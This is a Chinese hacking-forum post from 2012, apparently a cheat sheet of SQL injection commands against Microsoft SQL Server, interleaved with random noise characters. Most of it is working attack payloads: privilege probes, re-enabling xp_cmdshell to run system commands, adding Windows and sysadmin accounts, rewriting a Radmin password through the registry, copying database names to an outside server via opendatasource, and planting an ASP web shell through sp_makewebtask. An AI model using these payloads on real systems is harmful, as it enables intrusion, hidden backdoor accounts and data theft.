中国网络渗透测试联盟

标题: 常用的一些注入命令 [打印本页]
作者: admin    时间: 2012-9-15 14:40
标题: 常用的一些注入命令
//看看是什么权限的* C/ P2 N2 W1 ?, ~; I
and 1=(Select IS_MEMBER('db_owner'))
1 J  w+ N$ H! ?And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
1 }! `. b3 a- J/ y) M* _( q6 F( H5 [1 |* Q3 H7 `: v6 u
//检测是否有读取某数据库的权限
: Y! G5 t1 _* H( R2 land 1= (Select HAS_DBACCESS('master'))
# C! H& P* V8 A5 `And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --0 `) N) f, p+ [4 J) _
# L3 x  ]' L5 [5 s9 u

( o, F. t- S& q7 p8 J3 s) V数字类型
- a* R- \  M3 wand char(124)%2Buser%2Bchar(124)=05 d; u; r% Z) u, e9 e( R* ^& Y- [/ j

% q; i7 p: M9 p* j3 p& e字符类型
6 \; c* l5 A1 V9 N7 U8 w' and char(124)%2Buser%2Bchar(124)=0 and ''='
) e  v1 H2 b; E' ?; v
  J3 Z, O4 j6 [搜索类型9 @* u" m# `/ e
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
$ y& P" k2 Q' g: H- X& R7 q+ s+ }( y
爆用户名
" B- V9 R) i! P; Z1 nand user>0
+ L( j) h/ O4 p8 u6 W' and user>0 and ''='7 a' @( i$ X4 d+ I2 }, a. K' N
6 y, u: a7 B1 |% y$ k6 s
检测是否为SA权限0 `) F' @* x- P) H
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--0 B" K% U) h2 M3 ?/ {. i4 @+ A& X4 I
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --4 H6 u/ d( d3 L4 Y) Y" I; E) y5 P
% ]: {. E* n+ `7 |# _+ o
检测是不是MSSQL数据库; I) E/ s# H/ z+ A$ n
and exists (select * from sysobjects);--
( c: `# O* e0 S* ~- I5 X& @8 V% l& l3 x% R
检测是否支持多行0 ?2 m8 K3 J) m& Y0 |9 z2 R
;declare @d int;--5 J4 P. |* Q  d4 Q

+ ]& G. e3 [) Z& p4 v恢复 xp_cmdshell
8 Z- j; B) l/ V;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
9 X3 ~5 A# r+ e1 \$ b& F0 e) e' D
: T! `0 K* Z0 {8 R) n# N) \. [7 t  {
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
. s  @! h; `5 n5 m8 p( B1 q4 y4 ^9 Q$ j& K- g
//-----------------------, t. G8 N( {* I, J  n/ x9 ~9 ?
//       执行命令
, D3 Z3 q1 D  |  y. G9 N//-----------------------
: y9 h7 s6 u. P7 m首先开启沙盘模式:
& x6 O7 z: b2 [7 o1 |7 C8 Uexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1  w/ @  ?! \2 v9 G6 C" z

8 t7 i0 h/ ^# H4 F然后利用jet.oledb执行系统命令& b6 w* k* h. W
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
( b# p  }" b8 Q& [) h
5 A( {/ A$ T( {% p执行命令
9 Y+ R4 ~8 H+ |, L0 D! g% t;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--  A4 Z, K) s" }0 Z1 Y+ J6 V

6 [/ C( ]$ t- Q8 d, LEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
! x7 f8 M( ^) \6 K
! G3 e4 N0 J1 C, m" y8 n5 g判断xp_cmdshell扩展存储过程是否存在:4 j$ i8 k8 H* L3 m, P; k6 x
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')1 ?3 q( r6 D/ S! C0 \+ z

  d1 u0 U5 W: U# q写注册表" e  R: v+ C  K! i9 L
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1; q5 Z; b# J* a. R7 t6 t) G8 p

, b+ H9 B- J5 t1 n1 U/ V7 |. jREG_SZ  z) P2 P% n: ?' C
; }$ r; k4 F0 V$ W
读注册表
+ P4 d% c$ S( O% |: P& \exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
+ K* K( e1 e" t5 u' C  G2 h  [2 M9 [: \* z+ S" b( F3 a
读取目录内容1 ]2 h5 a9 J  q" @
exec master..xp_dirtree 'c:\winnt\system32\',1,1
! }+ E; ~% @+ I6 A/ [$ W7 e& }! t, F/ `) d4 d

2 b( c5 ]5 q- g( X& [' Q+ T数据库备份
  d2 U6 u, q& ?; Vbackup database pubs to disk = 'c:\123.bak'
5 h9 v8 w3 r2 n+ \0 E% @& ^7 I: {& g# Y/ \" y( ^$ b3 ~$ ^3 W6 b
//爆出长度
, l# Q# B& A5 h4 h6 KAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--% j6 ]. o3 I  @

. {! f+ Z* U9 O) J% G/ q, Q
1 y+ x5 c: k' a7 W' V! p9 I
! `0 o, `  d# R2 P更改sa口令方法:用sql综合利用工具连接后,执行命令:! _) D! {6 @4 D) |; T# V+ H" J
exec sp_password NULL,'新密码','sa'( |5 B/ ^6 F. b/ B% O
: p& d- @& p' J* U8 t/ T
添加和删除一个SA权限的用户test:9 P, i5 I* G2 N$ e" d- k7 V
exec master.dbo.sp_addlogin test,9530772
& g  B; F2 w# h5 Gexec master.dbo.sp_addsrvrolemember test,sysadmin0 [. q7 W$ p/ b2 k/ @

/ {( Q% R* M4 x, H2 ^( F6 l删除扩展存储过过程xp_cmdshell的语句:" A2 Z6 S! a( O  y; ]3 ]; w! G
exec sp_dropextendedproc 'xp_cmdshell'" I( |& H2 v9 `
% }" R2 o6 g* j  l
添加扩展存储过过程
0 o: T6 N1 W! O+ t: SEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'/ [8 W8 W: d* k% K. u
GRANT exec On xp_proxiedadata TO public9 F$ u0 m7 ]- q9 N; a

/ {" L6 [" K, Q% |* t8 i' e" H, y) J2 Z, U
停掉或激活某个服务。
: n$ t5 q# Q" N8 Q) T7 P; V6 m- R# Q/ d9 s0 f
exec master..xp_servicecontrol 'stop','schedule'7 d* Z6 D: {* l+ ?; W- P
exec master..xp_servicecontrol 'start','schedule'
2 G$ i& o; ~. V# T4 ?
. l& d- \' f1 l* s7 y) ?- ]1 _dbo.xp_subdirs
' V$ G+ W' `0 t4 R) T: G4 I  d; v. M8 Z$ n
只列某个目录下的子目录。
! l  v, x( @) cxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'* M) w" o( E4 U; J

5 k! y( l) c; P2 Jdbo.xp_makecab9 X6 q" J: y: j8 F9 o4 {% I/ P4 F

: f: L1 y, q$ v  A% C1 Q0 @  D8 _将目标多个档案压缩到某个目标档案之内。
6 Z7 ?$ |* Z( F. h4 h所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。5 e$ D! r7 d, @+ x* P

" p$ B; Y  B9 o+ Ldbo.xp_makecab
  t: U( P5 r5 B$ F'c:\test.cab','mszip',1,8 G! u! v. ^3 g0 m& L3 s% F8 v
'C:\Inetpub\wwwroot\SQLInject\login.asp',
" R. n( c: I, R# D% I'C:\Inetpub\wwwroot\SQLInject\securelogin.asp': u5 w2 E8 x5 w, N. {7 b
. h" Y1 R! D! \0 T+ s9 k7 n
xp_terminate_process$ ~% O* S7 [# T, U9 O5 ?

- V) I' A! N  }* I" o停掉某个执行中的程序,但赋予的参数是 Process ID。
- ~- ]) r1 `* L2 w9 d+ [* B利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
3 m" [/ Z& n4 B; t2 e" q% R1 i  U3 a3 \1 W' Q' G
xp_terminate_process 2484; b: Y6 ^) v4 ^# H6 m9 y

! B1 ?( ~* c  l. M* |xp_unpackcab" M7 w/ t! C- @1 S6 z- u$ h

  _. u8 L- N1 ?解开压缩档。& d/ d2 j, j! V8 ^* r3 Q& a6 L- r

# ^+ M! y# S6 Z' W6 N+ Kxp_unpackcab 'c:\test.cab','c:\temp',1
+ h' n6 e) H  [6 L6 S; Q: z& M8 Y7 ?

- E- K/ ]& e# \4 s某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
  A3 N# f* I* @. x
" }" h, y  f% m# q* O) I! m; }& zcreate database lcx;  [2 w- q5 _. }& n5 }
Create TABLE ku(name nvarchar(256) null);
. @; [; Q" k8 ^5 |0 o8 P! J: ^$ KCreate TABLE biao(id int NULL,name nvarchar(256) null);
+ S' e, r) e% F( Z
$ }8 R, O* V- p, x3 d7 y. Z+ d//得到数据库名
  j5 @6 L2 E" S+ x0 y# m* n( R' minsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases, Y$ i* F1 r- B% H$ Y% h' o
! o+ b% D# t3 `, A8 K1 _
' s8 U9 {$ `# z* I' l0 O
//在Master中创建表,看看权限怎样* T: l; `6 a( B$ y! ~6 r
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
+ [; D( U; U  @9 j* D# a) R( Z, K/ T# O, B: b  t; S  H
用 sp_makewebtask直接在web目录里写入一句话马:
( n0 y3 Y0 s% L; f+ {1 U9 shttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
* X3 X: u! h8 t; H) d
1 f, T8 L/ _! h# U; c! n, Q//更新表内容
3 N% z7 z, u8 u( w1 W8 [: iUpdate films SET kind = 'Dramatic' Where id = 1232 ]+ F5 H" {, Z7 M
( {& i& x$ [7 W5 y
//删除内容
4 L3 ~2 \+ D% M8 m. [delete from table_name where Stockid = 3



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2